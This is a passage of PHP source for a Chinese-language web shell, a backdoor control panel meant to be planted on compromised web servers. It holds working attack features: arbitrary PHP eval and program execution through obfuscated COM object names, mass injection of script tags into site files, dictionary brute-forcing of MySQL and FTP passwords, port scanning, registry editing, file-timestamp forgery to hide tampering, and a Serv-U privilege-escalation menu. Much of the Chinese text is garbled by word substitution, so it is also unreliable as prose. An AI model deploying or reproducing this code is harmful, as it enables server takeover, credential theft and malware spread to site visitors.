$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href="" href="""?action=phpinfo" target="_blank">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href="" href="""?action=reg">注册表操作</a>" : "";

$tb = new FORMS;

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css"><!--
body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
    font-family: "Verdana", "Tahoma", "宋体";
    font-size: "11px";
}
.INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}

.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
--></style><style type="text/css" bogus="1">body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
    font-family: "Verdana", "Tahoma", "宋体";
    font-size: "11px";
}
.INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}

.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
    for (var i=0;i<form.elements.length;i ) {
        var e = form.elements[i];
        if (e.name != 'chkall')
        e.checked = form.chkall.checked; }}
function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir=' d '&deldir=' f;} else {window.location.href='?dir=' d '&delfile=' f;}}}
</SCRIPT>
</head>
<title><?php echo"$myneme"?></title>
<body style="table-layout:fixed; word-break:break-all onmouseover=" style="table-layout:fixed; word-break:break-all onmouseover="window.status='设计:幽月 只限于网址管理员安全检验用,请务使用于地下用途,后果小编概不肩负';return true" style="FILTE安德拉: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
<center>
<?php
//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>'.gethostbyname($_SERVER['SERVER_NAME']).'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?dir='.$dirpath.'" href="?dir='.$dirpath.'">根目录</a> | <a href="?action=dir" href="?action=dir">Shell目录</a> | <a href="?action=phpenv" href="?action=phpenv">遇到变量</a> | <a href="?action=proxy" href="?action=proxy">在线代理</a>'.$reg.$phpinfo.' | <a href="?action=shell" href="?action=shell">WebShell</a> | <a href="?action=crack" href="?action=crack">杂项破解</a> | <a href="?action=mix" href="?action=mix">解压mix.dll</a> | <a href="?action=logout" href="?action=logout">注销登入</a>');
$tb->tdbody('<a href="?action=plgm" href="?action=plgm">批量挂马</a> | <a href="?action=downloads" href="?action=downloads">Http文件下载</a> | <a href="?action=search&dir='.$dir.'" href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval" href="?action=eval">实施php脚本</a> | <a href="?action=sql" href="?action=sql">实践SQL语句</a> | <a href="?action=mysqlfun" href="?action=mysqlfun">Func反弹Shell</a> | <a href="?action=sqlbak" href="?action=sqlbak">MySQL备份</a> | <a href="?action=SUExp" href="?action=SUExp">Serv-U提权</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>程序路线: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','显著','','submit').' 〖援助相对路线和相对路线〗'));

$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','明确','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));

$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','显著','','submit')));

$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','分明','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 实施操作 起初 =====================*/
echo "<p><b>n";
// 删除文件
if (!empty($delfile)) {
    if (file_exists($delfile)) {
        echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失利!";
    } else {
        echo basename($delfile)." 文件已海市蜃楼!";
    }
}

// 删除目录
elseif (!empty($deldir)) {
    $deldirs="$dir/$deldir";
    if (!file_exists("$deldirs")) {
        echo "$deldir 目录已子虚乌有!";
    } else {
        echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除退步!";
    }
}

// 创立目录
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
    if (!empty($newdirectory)) {
        $mkdirs="$dir/$newdirectory";
        if (file_exists("$mkdirs")) {
            echo "该目录已存在!";
        } else {
            echo (@mkdir("$mkdirs",0777)) ? "创设目录成功!" : "创设退步!";
            @chmod("$mkdirs",0777);
        }
    }
}

// 上传文件
elseif ($doupfile) {
    echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!";
}
elseif($action=="mysqlup"){
    $filename = $_FILES['upfile']['tmp_name'];
    if(!$filename) {
        echo"未有选拔要上传的文书。。";
    }else{
    $shell = file_get_contents($filename);
    $mysql = bin2hex($shell);
    if(!$upname) $upname = $_FILES['upfile']['name'];
    $shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
    $link=@mysql_connect($host,$user,$password);
    if(!$link){
        echo "登入战败".mysql_error();
    }else{
        $result = mysql_query($shell, $link);
        if($result){
            echo"操作成功.文件成功上传到".$host.",文件名字为".$uppath."/".$upname."..";
        }else{
                echo"上传退步 原因:".mysql_error();
            }
        }
    }

}
elseif($action=="mysqldown"){
    if(!empty($downtmp)) echo $downtmp;
}
// 编辑文件
elseif ($_POST['do'] == 'doeditfile') {
    if (!empty($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
    if($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
        $filename="$editfilename";
        @$fp=fopen("$filename","w");
        if($_POST['change']=="yes"){
        $filecontent = "?".">".$_POST['filecontent']."<?";
        $filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "<?phpn/*n代码由暗黑的辐射鱼加密!n*/neval(gzinflate(base64_decode('$filecontent')));n"."?>";
        }else{
        $filecontent = $_POST['filecontent'];
        }
        echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!";
        @fclose($fp);
        if($retime=="yes"){
echo" 鱼鱼自动操作:";
echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间战败!";
        }
    } else {
        echo "请输入想要编辑的公文名!";
    }
}
//文件下载
elseif ($_POST['do'] == 'downloads') {
    $contents = @file_get_contents($_POST['durl']);
    if(!$contents){
    echo"不大概读取要下载的数据";
    }
    elseif(file_exists($path)){
    echo"很对不起,文件".$path."已经存在了,请更动保存文件名。";
    }else{
$fp = @fopen($path,"w");
    echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时战败!";
    @fclose($fp);
    }
}
elseif($_POST['action']=="mix"){
    if(!file_exists($_POST['mixto'])){
    $tmp = base64_decode($mixdll);
    $tmp = gzinflate($tmp);
    $fp = fopen($_POST['mixto'],"w");
    echo $msg=@fwrite($fp,$tmp) ? "解压缩成功!" : "此目录不可写吗?!";
    fclose($fp);
}else{
    echo"不是吧?".$_POST['mixto']."已经存在了耶~";
}
}
// 编辑文件属性
elseif ($_POST['do'] == 'editfileperm') {
    if (!empty($_POST['fileperm'])) {
        $fileperm=base_convert($_POST['fileperm'],8,10);
        echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改退步!";
        echo " 文件 ".$file." 修改后的性质为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
    } else {
        echo "请输入想要设置的性质!";
    }
}

// 文件改名
elseif ($_POST['do'] == 'rename') {
    if (!empty($_POST['newname'])) {
        $newname=$_POST['dir']."/".$_POST['newname'];
        if (@file_exists($newname)) {
            echo "".$_POST['newname']." 已经存在,请重新输入三个!";
        } else {
            echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名称为 ".$_POST['newname']." !" : "文件名修改失利!";
        }
    } else {
        echo "请输入想要改的文本名!";
    }
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo"<span class="redfont">查找关键词:[".$oldkey."],上边呈现查找的结果:";
    if($type2 == "getpath"){
    echo"鼠标移到结果文件上会有部分截取彰显.";
}
echo"</span><br><hr width="775" noshade>";
find($path);
}else{
echo"你要查虾米?到底要查虾米吧?有未有虾米要你查啊?";
}
}
elseif ($_GET['action']=='plgmok') {
dirtree($_POST['dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
    $action = '?action=plgmok';
    $gm = "<script src="" src=";";
    $tb->tableheader();
    $tb->formheader($action,'批量挂马');
    $tb->tdbody('网址批量挂马程序php版','center');
    $tb->tdbody('文件地点: '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'<br>要挂代码:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','批量挂马').'<br>'.$tb->makeinput('submit','开始挂马','','submit'),'center','1','35');
    echo "</form>";
    $tb->tablefooter();
}//end plgm
// 克隆时间
elseif ($_POST['do'] == 'domodtime') {
    if (!@file_exists($_POST['curfile'])) {
        echo "要修改的文书海市蜃楼!";
    } else {
        if (!@file_exists($_POST['tarfile'])) {
            echo "要参照的公文不设有!";
        } else {
            $time=@filemtime($_POST['tarfile']);
            echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的退换时间修改战败!";
        }
    }
}

// 自定义时间
elseif ($_POST['do'] == 'modmytime') {
    if (!@file_exists($_POST['curfile'])) {
        echo "要修改的文本海市蜃楼!";
    } else {
        $year=$_POST['year'];
        $month=$_POST['month'];
        $data=$_POST['data'];        
        $hour=$_POST['hour'];
        $minute=$_POST['minute'];
        $second=$_POST['second'];
        if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
            $time=strtotime("$data $month $year $hour:$minute:$second");
            echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的更换时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的退换时间修改退步!";
        }
    }
}
elseif($do =='port'){
        $tmp = explode(",",$port);
        $count = count($tmp);
    for($i=$first;$i<$count;$i ){
            $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
            if($fp) echo"开掘".$host."主机展开了端口".$tmp[$i]."<br>";
    }
}
/*
此地代码写得很杂,说实话我要好都不知情写了怎么。
幸而能用,小编就没管了,若是有人看到差不离重写吧。*/
elseif ($do == 'crack') {//反正注册为全局变量了。
    if(@file_exists($passfile)){
        $tmp = file($passfile);
        $count = count($tmp);
        if(empty($onetime)){
            $onetime = $count;
            $turn="1";
        }else{
            $nowturn = $turn 1;
            $now = $turn*$onetime;
            $tt = intval(($count/$onetime) 1);
        }
        if($turn>$tt or $onetime>$count){
            echo"超越字典体量了耶~假如破解最后经过的,很对不起退步。";
            }else{
                $first = $onetime*($turn-1);
                for($i=$first;$i<$now;$i ){
                    if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
                    else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
                if($sa)
                    {
                    $t = "获取".$user."的密码为".$tmp[$i]."";
                    }
            }
            if(!$t){
                echo "<meta http-equiv="refresh" content="".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype.""><span style="" style="""font-size: 12px; font-family: Verdana"><a href="" href="""".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."">字典总共".$count."个,今后从".$first."到".$now.",".$admin[jumpsecond]."秒后拓展那".$onetime."个密码的试探. >>></a><br>全历本次".$type."的破解须要".$tt."次,未来是第".$turn."次解密。</span>";
    }
    else {
        echo"$t";
        }
            }
}else{
            echo"字典文件空头支票,请鲜明。";
            }
}
elseif($do =='port'){
    if(!eregi("-",$port)){
        $tmp = explode(",",$port);
        $count = count($tmp);
        $first = "1";
    }else{
        $tmp = explode("-",$port);
        $first = $tmp[0];
        $count = $tmp[1];

    }
    for($i=$first;$i<$count;$i ){
            if(!eregi("-",$port)){
            $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
            if($fp) echo"发掘".$host."主机张开了端口".$tmp[$i]."<br>";
            }else{
                $fp = @fsockopen($host, $i, $errno, $errstr, 1);
                if($fp) echo"发现".$host."主机张开了端口".$i."<br>";
            }
        }

    }
// 连接MYSQL
elseif ($connect) {
    if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
        echo "数据库连接成功!";
        mysql_close();
    } else {
        echo mysql_error();
    }
}

// 执行SQL语句
elseif ($_POST['do'] == 'query') {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失利");
    @mysql_select_db($dbname) or die("选拔数据库退步");
    $result = @mysql_query($_POST['sql_query']);
    echo ($result) ? "SQL语句成功实行!" : "出错: ".mysql_error();
    mysql_close();
}

// 备份操作
elseif ($_POST['do'] == 'backupmysql') {
    if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
        echo "请选拔欲备份的数据表和备份格局!";
    } else {
        if ($_POST['backuptype'] == 'server') {
            @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接退步");
            @mysql_select_db($dbname) or die("选择数据库失利");    
            $table = array_flip($_POST['table']);
            $filehandle = @fopen($path,"w");
            if ($filehandle) {
                $result = mysql_query("SHOW tables");
                echo ($result) ? NULL : "出错: ".mysql_error();
                while ($currow = mysql_fetch_array($result)) {
                    if (isset($table[$currow[0]])) {
                        sqldumptable($currow[0], $filehandle);
                        fwrite($filehandle,"nnn");
                    }
                }
                fclose($filehandle);
                echo "数据库已成功备份到 <a href="" href="""".$path."" target="_blank">".$path."</a>";
                mysql_close();
            } else {
                echo "备份失利,请确认目的文件夹是还是不是享有可写权限!";
            }
        }
    }
}
elseif($downrar) {
    if (!empty($dl)) {
        if(eregi("unzipto:",$localfile)){
        $path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
        $zip = new Zip;
        $zipfile=$dir."/".$dl[0];
        $array=$zip->get_list($zipfile);
        $count=count($array);
        $f=0;
        $d=0;
        for($i=0;$i<$count;$i ) {
            if($array[$i][folder]==0) {
                if($zip->Extract($zipfile,$path,$i)>0) $f ;
            }
            else $d ;
        }
        if($i==$f $d) echo "$dl[0] 解压到".$path."成功<br>($f 个文件 $d 个目录)";
        elseif($f==0) echo "$dl[0] 解压到".$path."失败";
        else echo "$dl[0] 未解压完整<br>(已解压 $f 个文本 $d 个目录)";
        }else{
    $zipfile="";
    $zip = new Zip;
    for($k=0;isset($dl[$k]);$k )
        {
            $zipfile=$dir."/".$dl[$k];
            if(is_dir($zipfile))
            {
                unset($zipfilearray);
                addziparray($dl[$k]);
                for($i=0;$zipfilearray[$i];$i )
                {
                    $filename=$zipfilearray[$i];
                    $filesize=@filesize($dir."/".$zipfilearray[$i]);
                    $fp=@fopen($dir."/".$filename,rb);
                    $zipfiles[]=Array($filename,@fread($fp,$filesize));
                    @fclose($fp);
                }
            }
            else
            {
                $filename=$dl[$k];
                $filesize=@filesize($zipfile);
                $fp=@fopen($zipfile,rb);
                $zipfiles[]=Array($filename,@fread($fp,$filesize));
                @fclose($fp);
            }
        }
        $zip->Add($zipfiles,1);
        $code = $zip->get_file();
        $ck = "_QQ44997_".date("Y-m-d",time())."";
        if(empty($localfile)){
        header("Content-type: application/octet-stream");
        header("Accept-Ranges: bytes");
        header("Accept-Length: ".strlen($code));
        header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip");
        echo $code;
        exit;
        }else{
         $fp = @fopen("".$dir."/".$localfile."","w");
         echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "目录".$dir."无可写权限!";
         @fclose($fp);
        }
        }
    } else {
        echo "请采纳要卷入下载的文书!";
    }
}
// Shell.Application 运转程序
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
    $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
    $a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
    echo ($a=='0') ? "程序已经打响实践!" : "程序运转失利!";
}
// 查看PHP配置参数景况
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
    echo "配置参数 ".$_POST['phpvarname']." 检验结果: ".getphpcfg($_POST['phpvarname'])."";
}
// 读取注册表
elseif(($regread) AND !empty($_POST['readregname'])) {
    $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
    var_dump(@$shell->RegRead($_POST['readregname']));
}

// 写入注册表
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
    $shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
    $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
    echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!";
}
// 删除注册表
elseif(($regdelete) AND !empty($_POST['delregname'])) {
    $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
    $a = @$shell->RegDelete($_POST['delregname']);
    echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!";
}
else {
    echo "$notice";
    echo "<a href="" href="""?dir=C:/Program Files/">Program</a> | <a href="" href="""?dir=C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere">pcAnywhere</a> | <a href="" href="""?dir=C:/Documents and Settings/All Users/「开始」菜单/程序">起始先后</a> | <a href="" href="""?dir=C:/Documents and Settings/All Users">AllUsers</a> | <a href="" href="""?dir=C:/Program Files/RhinoSoft.com/Serv-U">Serv-U</a> | ";
    for ($i=66;$i<=90;$i ){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title="$drive/" href="" href="""?dir=$drive/">$drive\</a>";}
}

}
echo "</b></p>n";
/*===================== 施行操作 截至 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
    $tb->tableheader();
?>
<tr bgcolor="#cccccc">
<td align="center" nowrap width="27%"><b>文件</b></td>
    <td align="center" nowrap width="16%"><b>创制日期</b></td>
<td align="center" nowrap width="16%"><b>最终修改</b></td>
<td align="center" nowrap width="11%"><b>大小</b></td>
<td align="center" nowrap width="6%"><b>属性</b></td>
<td align="center" nowrap width="24%"><b>操作</b></td>
</tr>
<FORM action="" method="POST">
<?php
// 目录列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="1"){
        if($file!=".." && $file!=".")    {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
            $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
            echo "<tr class=".getrowbg().">n";
            echo " <td style="" style="""padding-left: 5px;"><INPUT type=checkbox value=$file name=dl[]> [<a href="" href="""?dir=".urlencode($dir)."/".urlencode($file).""><font color="#006699">$file</font></a>]</td>n";
            echo " <td align="center" nowrap class="smlfont">$ctime</td>n";
            echo " <td align="center" nowrap class="smlfont">$mtime</td>n";
            echo " <td align="center" nowrap class="smlfont"><a href="" href="""?action=search&dir=".$filepath."">Search</a></td>n";
            echo " <td align="center" nowrap class="smlfont"><a href="" href="""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."">$dirperm</a></td>n";
            echo " <td align="center" nowrap>| <a href="" href="""#" onclick="really('".urlencode($dir)."','".urlencode($file)."','你鲜明要刨除 $file 目录吗? \n\n倘诺该目录非空,此番操作将会删除该目录下的享有文件!','1')">删除</a> | <a href="" href="""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."">改名</a> |</td>n";
            echo "</tr>n";
            $dir_i ;
        } else {
            if($file=="..") {
                echo "<tr class=".getrowbg().">n";
                echo " <td nowrap colspan="6" style="" style="""padding-left: 5px;"><a href="" href="""?dir=".urlencode($dir)."/".urlencode($file)."">重回上级目录</a></td>n";
                echo "</tr>n";
            }
        }
    }
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<?
// 文件列表
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="0"){        
        $size=@filesize($filepath);
        $size=$size/1024 ;
        $size= @number_format($size, 3);
        if (@filectime($filepath) == @filemtime($filepath)) {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
        } else {
            $ctime="<span class="redfont">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
            $mtime="<span class="redfont">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
        }
        @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
        echo "<tr class=".getrowbg().">n";
        echo " <td style="" style="""padding-left: 5px;">";
        echo "<INPUT type=checkbox value=$file name=dl[]>";
        echo "<a href="" href="""$filepath" target="_blank">$file</a></td>n";
        echo " <td align="center" nowrap class="smlfont">$ctime</td>n";
        echo " <td align="center" nowrap class="smlfont">$mtime</td>n";
        echo " <td align="right" nowrap class="smlfont"><span class="redfont">$size</span> KB</td>n";
        echo " <td align="center" nowrap class="smlfont"><a href="" href="""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."">$fileperm</a></td>n";
        echo " <td align="center" nowrap><a href="" href="""?downfile=".urlencode($filepath)."">下载</a> | <a href="" href="""?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."">编辑</a> | <a href="" href="""#" onclick="really('".urlencode($dir)."','".urlencode($filepath)."','你规定要刨除 $file 文件呢?','2')">删除</a> | <a href="" href="""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."">改名</a> | <a href="" href="""?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."">时间</a></td>n";
        echo "</tr>n";
        $file_i ;
    }
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "<a href="" href="""#" title="使用表达" onclick="alert('Php为平安格局尽量少打包内容防止脚本超时\n\n填写文件名则把文件保留在地点福利操作,不填则一直下载。')">(?)</a>";
else $z = "<a href="" href="""#" title="使用验证" onclick="alert('Php运维非安全情势,打包大件请等啊等啊等啊等\n\n填写文件名则把公文物保护留在本土福利操作,不填则一贯下载。')">(?)</a>";
$tb->tdbody('<table width="百分百" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' 本三步跳件:'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','选中封装下载或地点保存','','submit').' '.$z.'</td><td align="right">'.$dir_i.' 个目录 / '.$file_i.' 个文件</td></tr></table>','center',getrowbg(),'','','6');

echo "</FORM>n";
echo "</table>n";
}// end dir

elseif ($_GET['action'] == "editfile") {
    if(empty($newfile)) {
        $filename="$dir/$editfile";
        $fp=@fopen($filename,"r");
        $contents=@fread($fp, filesize($filename));
        @fclose($fp);
        $contents=htmlspecialchars($contents);
    }else{
        $editfile=$newfile;
        $filename = "$dir/$editfile";
    }
    $action = "?dir=".urlencode($dir)."&editfile=".$editfile;
    $tb->tableheader();
    $tb->formheader($action,'新建/编辑文件');
    $tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: <input type="checkbox" name="change" value="yes" onclick="javascript:alert('这一个效果只能用来加密只怕压缩完整的php代码。\n\n非php代码或不完整php代码或不帮助gzinflate函数请不要采纳!')"> ');
    $tb->tdbody($tb->maketextarea('filecontent',$contents));
    $tb->makehidden('do','doeditfile');
    $tb->formfooter('1','30');
}//end editfile

elseif ($_GET['action'] == "rename") {
    $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
    $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
    $tb->tableheader();
    $tb->formheader($action,'修改文件名');
    $tb->makehidden('oldname',$dir."/".$nowfile);
    $tb->makehidden('dir',$dir);
    $tb->tdbody('当前文件名: '.basename($nowfile));
    $tb->tdbody('改名为: '.$tb->makeinput('newname'));
    $tb->makehidden('do','rename');
    $tb->formfooter('1','30');
}//end rename

elseif ($_GET['action'] == "eval") {
    $action = "?dir=".urlencode($dir)."";
    $tb->tableheader();
    $tb->formheader(''.$action.' "target="_blank' ,'执行php脚本');
    $tb->tdbody($tb->maketextarea('phpcode',$contents));
    $tb->formfooter('1','30');

}
elseif ($_GET['action'] == "fileperm") {
    $action = "?dir=".urlencode($dir)."&file=".$file;
    $tb->tableheader();
    $tb->formheader($action,'修改文件属性');
    $tb->tdbody('修改 '.$file.' 的质量为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
    $tb->makehidden('file',$file);
    $tb->makehidden('dir',urlencode($dir));
    $tb->makehidden('do','editfileperm');
    $tb->formfooter('1','30');
}//end fileperm

elseif ($_GET['action'] == "newtime") {
    $action = "?dir=".urlencode($dir);
    $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
    $tb->tableheader();
    $tb->formheader($action,'克隆文件最终修改时间');
    $tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目的文件: ".$tb->makeinput('tarfile','需填完整路线及文件名'),'center','2','30');
    $tb->makehidden('do','domodtime');
    $tb->formfooter('','30');
    $tb->formheader($action,'自定义文件最终修改时间');
    $tb->tdbody('<br><ul><li>有效的时光戳标准范围是从Green威治时间 1902 年 12 月 13 日 周一 20:45:54 到 2038年 1 月 19 日 周三03:14:07<br>(该日期依照 叁11位有暗号整数的最小值和最大值而来)</li><li>表明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>','left');
    $tb->tdbody('当前文件名: '.$file);
    $tb->makehidden('curfile',$file);
    $tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
    $tb->makehidden('do','modmytime');
    $tb->formfooter('1','30');
}//end newtime

elseif ($_GET['action'] == "shell") {
    $action = "??action=shell&dir=".urlencode($dir);
    $tb->tableheader();
    $tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
        $program = isset($_POST['program']) ? $_POST['program'] : "c:winntsystem32cmd.exe";
        $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
        echo "<form action="?action=shell&dir=".urlencode($dir)."" method="POST">n";
        $tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
        $tb->makehidden('do','programrun');
        echo "</form>n";
    }
